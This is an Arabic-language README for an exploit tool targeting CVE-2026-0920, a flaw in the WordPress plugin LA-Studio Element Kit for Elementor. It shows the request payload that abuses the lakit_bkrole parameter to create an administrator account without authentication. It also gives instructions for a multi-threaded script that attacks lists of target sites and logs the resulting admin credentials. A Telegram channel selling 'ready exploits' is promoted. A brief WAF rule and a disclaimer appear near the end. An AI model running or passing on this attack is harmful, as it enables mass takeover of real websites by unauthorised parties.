
LA-Studio Element Kit لـ Elementor <= 1.5.6.3 - تصعيد امتيازات دون مصادقة عبر باب خلفي لإنشاء مستخدم إداري عبر معامل lakit_bkrole
LA-Studio Element Kit for Elementor <= 1.5.6.3 - تصعيد صلاحيات غير مصادق عليه عبر باب خلفي لإنشاء مستخدم إداري عبر معامل lakit_bkrole
_____ _____ ___ __ ___ __ __ ___ ___ __
/ __\ \ / / __|_|_ ) \_ )/ / ___ / \/ _ \_ ) \
| (__ \ V /| _|___/ / () / // _ \___| () \_, // / () |
\___| \_/ |___| /___\__/___\___/ \__/ /_//___\__/
📡 الاستغلال يُنشر هنا أولاً. تابع @KNxploited على تيليغرام — مصدرك النخبوي لأحدث ثغرات CVE المُعلنة، ونماذج الإثبات (PoCs) الجاهزة، وأبحاث أمنية دقيقة. يُحدَّث باستمرار. صُمم لمن يبقون في المقدمة.
CVE-2026-0920 هي ثغرة حرجة بدرجة 9.8 وفق CVSS اكتُشفت في ملحق ووردبريس LA-Studio Element Kit for Elementor.
يقع الخلل في دالة ajax_register_handle()، التي تعالج تسجيلات المستخدمين غير المصادَق عليهم عبر AJAX. تفشل الدالة في فرض أي قيد على معامل lakit_bkrole — مما يسمح لمهاجم غير مصادق تمامًا بإسناد دور administrator لنفسه أثناء التسجيل، محققًا السيطرة الكاملة على لوحة تحكم ووردبريس من طلب واحد.
السبب الجذري هو غياب فحص صلاحيات الدور داخل معالج تسجيل AJAX في الملحق:
// Registered with no authentication requirement
add_action('wp_ajax_nopriv_lakit_ajax', [$this, 'ajax_register_handle']);
public function ajax_register_handle() {
$actions = json_decode(stripslashes($_POST['actions']), true);
foreach ($actions as $req) {
if ($req['action'] === 'register') {
$data = $req['data'];
$user_data = [
'user_login' => $data['username'],
'user_pass' => $data['password'],
'user_email' => $data['email'],
'role' => $data['lakit_bkrole'], // ← ATTACKER CONTROLLED
];
// No validation of $data['lakit_bkrole'] against allowed roles
wp_insert_user($user_data); // Administrator created silently
}
}
}
لماذا هذا بالغ الخطورة؟
wp_ajax_nopriv_* = يمكن الوصول إليه من أي شخص دون أي مصادقةlakit_bkrole يقبل أي سلسلة أدوار في ووردبريس — بما في ذلك administratorStep 1 — Nonce Harvesting
──────────────────────────────────────────────────────────────────────
GET / (or /index.php, /home, /?page_id=1)
Search HTML/JS for:
"ajaxNonce": "<value>" ← Inline JSON config
ajaxNonce: '<value>' ← JS variable
data-ajaxnonce="<value>" ← HTML attribute
Nonce is publicly accessible — no login required.
↓
ajaxNonce extracted ✔️
──────────────────────────────────────────────────────────────────────
Step 2 — Admin Account Registration
──────────────────────────────────────────────────────────────────────
POST /wp-admin/admin-ajax.php
action = lakit_ajax
_nonce = <extracted nonce>
actions = {
"req1": {
"action": "register",
"data": {
"email": "[email protected]",
"password": "adminSA",
"username": "Nx_admin",
"lakit_field_log": "yes", ← use supplied username
"lakit_field_pwd": "yes", ← use supplied password
"lakit_field_cpwd": "no", ← skip password confirm
"lakit_bkrole": "1", ← trigger admin role injection
"lakit_recaptcha_response": ""
}
}
}
↓
Administrator account silently created ✔️
──────────────────────────────────────────────────────────────────────
Step 3 — Full Admin Verification
──────────────────────────────────────────────────────────────────────
POST /wp-login.php
log = Nx_admin
pwd = adminSA
↓
Session cookies obtained → GET /wp-admin/plugin-install.php
↓
Plugin install page accessible = CONFIRMED FULL ADMIN ✔️
pip install requests colorama
| الاعتماد | الغرض |
|---|---|
requests | طلبات HTTP، إدارة الجلسات، التعامل مع الكوكيز |
colorama | مخرجات طرفية ملونة على جميع المنصات |
يُنصح باستخدام بايثون 3.10+ (يستخدم تلميحات أنواع
str | None).
CVE-2026-0920/
├── CVE-2026-0920.py # Main exploit script
├── list.txt # Target URLs — one per line
├── success_results.txt # Auto-generated: pwned targets + credentials
افتح CVE-2026-0920.py وعدّل الثوابت في الأعلى لضبط تفاصيل حساب المدير المطلوب:
ADMIN_EMAIL = "[email protected]" # Email for the new admin account
ADMIN_PASSWORD = "adminSA" # Password for the new admin account
ADMIN_USERNAME = "Nx_admin" # Username for the new admin account
أنشئ list.txt مع رابط هدف واحد في كل سطر:
https://target1.com
https://target2.com
http://target3.com
الروابط بدون بروتوكول تُضاف إليها
https://تلقائيًا.
python CVE-2026-0920.py
سيُطلب منك:
Enter targets list filename (e.g. list.txt): list.txt
Enter number of threads (1-50): 20
يُنتج السكربت مخرجات طرفية ملونة وفي الوقت الفعلي:
[14:22:01] [*] https://target.com - Starting target
[14:22:02] [+] https://target.com - kay: a4f9c2b1e3
[14:22:02] [*] https://target.com - AJAX HTTP status: 200
[14:22:03] [+] https://target.com - AJAX response indicates success
[14:22:04] [*] https://target.com - Full admin verification: OK
============================================================
[ SUCCESS BLOCK ]
Site : https://target.com
Result : SUCCESS
AJAX OK : YES
FULL ADMIN : YES (login + plugin install access)
============================================================
| اللون | المعنى |
|---|---|
تُكتب الاستغلالات الناجحة إلى success_results.txt:
https://victim.com | USERNAME:Nx_admin | EMAIL:[email protected] | PASSWORD:adminSA | LOGIN:FULL_ADMIN_OK | RESP_SUCCESS:YES | NONCE:a4f9c2b1e3
كل سطر يحتوي الصورة الكاملة: الهدف، بيانات الدخول، حالة تسجيل الدخول، حالة استجابة AJAX، والـ nonce المستخدم.
ينفذ السكربت تحققًا من مرحلتين لاستبعاد النتائج الإيجابية الخاطئة:
Stage 1 — AJAX Response Analysis
Checks for success markers in the JSON response:
• "created successfully"
• "success":true
• "type":"success"
• "status":"success"
Stage 2 — Real Login + Plugin Install Access Test
1. POST /wp-login.php with injected credentials
2. GET /wp-admin/plugin-install.php
3. Confirm 200 response + plugin upload form present
4. Confirm no redirect back to wp-login.php
Only BOTH stages passing = TRUE SUCCESS reported
هذا يستبعد النتائج الإيجابية الخاطئة الناتجة عن مواقع تُرجع 200 OK على AJAX لكنها تفشل بصمت في التسجيل.
يولّد الاستغلال هذا النمط الشبكي المحدد — للمدافعين ومؤلفي جدران الحماية (WAF):
POST /wp-admin/admin-ajax.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
action=lakit_ajax&_nonce=<VALUE>&actions={"req1":{"action":"register","data":{...,"lakit_bkrole":"1",...}}}
قاعدة WAF / IDS (شبه كود):
IF request.method == POST
AND request.path == "/wp-admin/admin-ajax.php"
AND request.body CONTAINS "lakit_ajax"
AND request.body CONTAINS "lakit_bkrole"
THEN BLOCK + ALERT (Privilege Escalation Attempt — CVE-2026-0920)
إذا كنت مالك موقع، أو مطورًا، أو مدافعًا، فتصرف فورًا:
admin-ajax.php التي تحتوي على lakit_bkrole على مستوى جدار الحماية (WAF)lakit_ajaxTHIS TOOL IS PROVIDED STRICTLY FOR EDUCATIONAL, AUTHORIZED PENETRATION
TESTING, AND SECURITY RESEARCH PURPOSES ONLY.
By downloading, executing, or modifying this script, you explicitly agree:
• You hold EXPLICIT, WRITTEN authorization from the owner of every
target system you test. No exceptions. No grey areas.
• You are operating within a formally scoped, authorized penetration
testing engagement or a controlled lab environment.
• You will NOT use this tool against any system, network, or
infrastructure without documented legal permission.
• Nxploited and all contributors bear ZERO liability for unauthorized
use, data loss, system damage, legal proceedings, or criminal
prosecution arising from the use of this tool.
Unauthorized use of this exploit constitutes a criminal offense under:
— Computer Fraud and Abuse Act (CFAA), USA
— Computer Misuse Act (CMA), UK
— EU Directive 2013/40/EU on Attacks Against Information Systems
— Saudi Arabia's Anti-Cyber Crime Law (No. M/17)
— And all equivalent national and international cybercrime legislation.
USE RESPONSIBLY. HACK ETHICALLY. DISCLOSE RESPONSIBLY.
| الاسم المستعار | Nxploited |
| تيليغرام | @KNxploited |
| GitHub | github.com/Nxploited |
🔔 تابع @KNxploited على تيليغرام ثغرات CVE جديدة. استغلالات جاهزة. أبحاث معمقة في الثغرات. أول من يعرف. أول من يتحرك. لا تكن الأخير.
| الحقل | التفاصيل |
|---|
| معرف CVE | CVE-2026-0920 |
| الملحق | LA-Studio Element Kit for Elementor |
| المعرّف (Slug) | lakit / la-studio-element-kit-for-elementor |
| الإصدارات المتأثرة | جميع الإصدارات حتى 1.5.6.3 شاملة |
| نوع الثغرة | تصعيد صلاحيات غير مصادق عليه / إنشاء مدير |
| متجه الهجوم | شبكة — لا يتطلب مصادقة |
| درجة CVSS 3.1 | 9.8 حرجة |
| متجه CVSS | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CNA | Wordfence |
| الأثر | السيطرة الكاملة على حساب مدير ووردبريس |
| الباحث | Nxploited |
threading | معالجة متزامنة لأهداف متعددة |
re | استخراج الـ nonce من HTML/JS عبر التعبيرات النمطية |
🔵 سماوي [*] |
| معلوماتي — خطوة قيد التنفيذ |
🟢 أخضر [+] | إشارة إيجابية — نجاح جزئي أو كامل |
🟡 أصفر [!] | تحذير — نتيجة غامضة تحتاج مراجعة |
🔴 أحمر [-] | فشل — الهدف غير قابل للاستغلال أو حدث خطأ |
| المعامل | الافتراضي | الوصف |
|---|
| ملف الأهداف | list.txt | الملف الذي يحتوي روابط الأهداف |
| عدد الخيوط | 10 (الحد الأقصى: 50) | العمال المتزامنون |
ADMIN_EMAIL | [email protected] | البريد الإلكتروني لحساب المدير المُحقن |
ADMIN_PASSWORD | adminSA | كلمة المرور لحساب المدير المُحقن |
ADMIN_USERNAME | Nx_admin | اسم المستخدم لحساب المدير المُحقن |